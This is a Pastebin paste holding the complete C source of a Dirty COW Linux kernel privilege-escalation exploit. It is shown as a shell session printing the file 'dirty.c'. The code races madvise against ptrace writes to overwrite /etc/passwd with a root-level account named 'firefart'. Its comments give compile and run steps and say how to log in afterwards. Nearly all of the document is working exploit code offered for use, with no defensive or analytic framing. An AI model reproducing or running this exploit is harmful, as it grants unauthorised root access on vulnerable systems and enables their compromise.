Advertisement
Guest User

Untitled

a guest
Jan 20th, 2017
101
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.06 KB | None | 0 0
  1. [grit@lebensraum ~]$ cat dirty.c
  2. // EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
  3. //
  4. // This exploit uses the pokemon exploit of the dirtycow vulnerability
  5. // as a base and automatically generates a new passwd line.
  6. // The user will be prompted for the new password when the binary is run.
  7. // The original /etc/passwd file is then backed up to /tmp/passwd.bak
  8. // and overwrites the root account with the generated line.
  9. // After running the exploit you should be able to login with the newly
  10. // created user.
  11. //
  12. // To use this exploit modify the user values according to your needs.
  13. // The default is "firefart".
  14. //
  15. // Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
  16. // https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
  17. //
  18. // Compile with:
  19. // gcc -pthread dirty.c -o dirty -lcrypt
  20. //
  21. // Then run the newly create binary by either doing:
  22. // "./dirty" or "./dirty my-new-password"
  23. //
  24. // Afterwards, you can either "su firefart" or "ssh firefart@..."
  25. //
  26. // DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
  27. // mv /tmp/passwd.bak /etc/passwd
  28. //
  29. // Exploit adopted by Christian "FireFart" Mehlmauer
  30. // https://firefart.at
  31. //
  32.  
  33. #include <fcntl.h>
  34. #include <pthread.h>
  35. #include <string.h>
  36. #include <stdio.h>
  37. #include <stdint.h>
  38. #include <sys/mman.h>
  39. #include <sys/types.h>
  40. #include <sys/stat.h>
  41. #include <sys/wait.h>
  42. #include <sys/ptrace.h>
  43. #include <stdlib.h>
  44. #include <unistd.h>
  45. #include <crypt.h>
  46.  
  47. const char *filename = "/etc/passwd";
  48. const char *backup_filename = "/tmp/passwd.bak";
  49. const char *salt = "firefart";
  50.  
  51. int f;
  52. void *map;
  53. pid_t pid;
  54. pthread_t pth;
  55. struct stat st;
  56.  
  57. struct Userinfo {
  58. char *username;
  59. char *hash;
  60. int user_id;
  61. int group_id;
  62. char *info;
  63. char *home_dir;
  64. char *shell;
  65. };
  66.  
  67. char *generate_password_hash(char *plaintext_pw) {
  68. return crypt(plaintext_pw, salt);
  69. }
  70.  
  71. char *generate_passwd_line(struct Userinfo u) {
  72. const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
  73. int size = snprintf(NULL, 0, format, u.username, u.hash,
  74. u.user_id, u.group_id, u.info, u.home_dir, u.shell);
  75. char *ret = malloc(size + 1);
  76. sprintf(ret, format, u.username, u.hash, u.user_id,
  77. u.group_id, u.info, u.home_dir, u.shell);
  78. return ret;
  79. }
  80.  
  81. void *madviseThread(void *arg) {
  82. int i, c = 0;
  83. for(i = 0; i < 200000000; i++) {
  84. c += madvise(map, 100, MADV_DONTNEED);
  85. }
  86. printf("madvise %d\n\n", c);
  87. }
  88.  
  89. int copy_file(const char *from, const char *to) {
  90. // check if target file already exists
  91. if(access(to, F_OK) != -1) {
  92. printf("File %s already exists! Please delete it and run again\n",
  93. to);
  94. return -1;
  95. }
  96.  
  97. char ch;
  98. FILE *source, *target;
  99.  
  100. source = fopen(from, "r");
  101. if(source == NULL) {
  102. return -1;
  103. }
  104. target = fopen(to, "w");
  105. if(target == NULL) {
  106. fclose(source);
  107. return -1;
  108. }
  109.  
  110. while((ch = fgetc(source)) != EOF) {
  111. fputc(ch, target);
  112. }
  113.  
  114. printf("%s successfully backed up to %s\n",
  115. from, to);
  116.  
  117. fclose(source);
  118. fclose(target);
  119.  
  120. return 0;
  121. }
  122.  
  123. int main(int argc, char *argv[])
  124. {
  125. // backup file
  126. int ret = copy_file(filename, backup_filename);
  127. if (ret != 0) {
  128. exit(ret);
  129. }
  130.  
  131. struct Userinfo user;
  132. // set values, change as needed
  133. user.username = "firefart";
  134. user.user_id = 0;
  135. user.group_id = 0;
  136. user.info = "pwned";
  137. user.home_dir = "/root";
  138. user.shell = "/bin/bash";
  139.  
  140. char *plaintext_pw;
  141.  
  142. if (argc >= 2) {
  143. plaintext_pw = argv[1];
  144. printf("Please enter the new password: %s\n", plaintext_pw);
  145. } else {
  146. plaintext_pw = getpass("Please enter the new password: ");
  147. }
  148.  
  149. user.hash = generate_password_hash(plaintext_pw);
  150. char *complete_passwd_line = generate_passwd_line(user);
  151. printf("Complete line:\n%s\n", complete_passwd_line);
  152.  
  153. f = open(filename, O_RDONLY);
  154. fstat(f, &st);
  155. map = mmap(NULL,
  156. st.st_size + sizeof(long),
  157. PROT_READ,
  158. MAP_PRIVATE,
  159. f,
  160. 0);
  161. printf("mmap: %lx\n",(unsigned long)map);
  162. pid = fork();
  163. if(pid) {
  164. waitpid(pid, NULL, 0);
  165. int u, i, o, c = 0;
  166. int l=strlen(complete_passwd_line);
  167. for(i = 0; i < 10000/l; i++) {
  168. for(o = 0; o < l; o++) {
  169. for(u = 0; u < 10000; u++) {
  170. c += ptrace(PTRACE_POKETEXT,
  171. pid,
  172. map + o,
  173. *((long*)(complete_passwd_line + o)));
  174. }
  175. }
  176. }
  177. printf("ptrace %d\n",c);
  178. }
  179. else {
  180. pthread_create(&pth,
  181. NULL,
  182. madviseThread,
  183. NULL);
  184. ptrace(PTRACE_TRACEME);
  185. kill(getpid(), SIGSTOP);
  186. pthread_join(pth,NULL);
  187. }
  188.  
  189. printf("Done! Check %s to see if the new user was created\n", filename);
  190. printf("You can log in with username %s and password %s.\n\n",
  191. user.username, plaintext_pw);
  192. printf("\nDON'T FORGET TO RESTORE %s FROM %s !!!\n\n",
  193. filename, backup_filename);
  194. return 0;
  195. }
  196. [grit@lebensraum ~]$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement